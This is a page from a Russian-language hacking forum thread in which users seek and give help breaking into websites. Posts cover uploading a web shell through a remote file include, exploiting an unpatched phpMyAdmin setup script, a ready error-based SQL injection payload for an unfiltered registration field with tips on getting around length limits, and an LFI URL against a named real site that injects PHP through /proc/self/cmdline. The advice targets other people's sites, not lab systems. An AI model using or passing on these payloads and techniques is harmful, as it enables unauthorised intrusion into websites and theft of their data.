Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    Теперь я знаю какой код на странице
    <?php require $page ?>
    т.е это получается инклуд всё-таки...но почему он при
    site.com/page.php=http://shell.com/shell.php показывает шелл, но на моём же хосте?
    Подскажите плиз как залить шелл сюда?

    register_globals=Off
     
    #19801 Spunoff, 15 Mar 2012
    Last edited: 15 Mar 2012
  2. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Скорее всего потомучто выполняеться на твоем хосте?
    Переименуй из php в txt и проверь.
     
  3. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    mironich спасибо, помогло:)
     
  4. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть на одном сайте phpMyAdmin 2.11.11.3 c не потертым сетапом.
    Есть ли возможность получить доступ к бд или залить шелл?
    Все-таки версия старая, да и /scripts/setup.php доступен, но эксплойты найти не могу. В базах эксплойтов ничего нет, да и активное гугление не помогло.
    Есть ли вообще известные уязвимости под эту версию?
     
  5. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    https://rdot.org/forum/showpost.php?p=13736&postcount=6

    при mq=off и PHP <= 5.2.13 или PHP <= 5.3.2
    https://rdot.org/forum/showpost.php?p=18082&postcount=20
    или сплоит мага, был раньше здесь http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

    Можно эксплуатировать, как обычный инклуд RFI, LFI.
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а какми образом я так окончание отброшу? чёт я недопёр, покажи пример плыз
     
  7. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    https://forum.antichat.ru/thread98525.html
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    блин я же написал

     
  9. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
    ввел например туда '1 и он ошибку вывел
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Вывести данные из базы, в ошибке, вбив в не фильтруемое поле:
    ' and (select 1 from(select count(*), concat(version(), 0x00, floor(rand(0)*2))x РЕАЛЬНАЯ_ТАБЛИЦА group by x)a) or '
     
    _________________________
  11. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    там ограничение 40 символов к сожалению
    там два поля идет уязвимых,
    там идет первое поле 40 символов, второе поле 40 символов, '0', 0); т.е так скорей всего
    'тут первое поле','тут второе','0',0);

    в скрипте ограничение
     
    #19811 CheatXX, 15 Mar 2012
    Last edited: 15 Mar 2012
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    ограничение где именно? в форме, или в обрабатываемом скрипте?
    если первое, то легко обходится, посылкой собственного запроса
    второе к сожалению не обойти
     
    _________________________
  13. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй разделить запрос как-то =)
     
  15. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    в самом скрипте ограничение
     
  16. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    запрос выглядит как:
    site.ru/generat1.php?src=sitefotos/sitefotos_13153512082010.jpg
    при подмене на
    site.ru/generat1.php?src=site.ru/1.gif выводит картинку.. скрипты и т д не исполняет... что делать?
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    CheatXX, попробуй так разделить запросы например :D
    ReV0LVeR,
    ничего кроме раскрытия пути ты не получишь думаю.
     
  18. CheatXX

    CheatXX New Member

    Joined:
    8 Jun 2009
    Messages:
    154
    Likes Received:
    2
    Reputations:
    0
    там 140 символов получается, а два поля дают только 80) может кто то сайт посмотреть :rolleyes: ? ссылку в лс скину

    еше 1 поле есть, ограничения нет но выдает:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'accounts group by x)a) or '',0)' at line 1
     
    #19818 CheatXX, 15 Mar 2012
    Last edited: 15 Mar 2012
  19. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    LFI

    А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода:
    Code:
    http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&<?php print php_uname();?>
     
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108


    В первую очередь у пользователя под которым работает веб-сервер непосредственно обрабатывающий PHP скрипты должны быть права на виртуальную файловую ситстему /proc. Во вторых в скрипте в функции инклуда не должно быть препенда вида /xxx.$etc Далее как было указано многоуважаемым Expl0ited не через браузер ибо url-encoded строка делается. Так-же , в скрипте может оказывать влияние какая-либо фильтрация или рекодировка и прочие финты программиста. Естественно magic_quotes Off.
     
Thread Status:
Not open for further replies.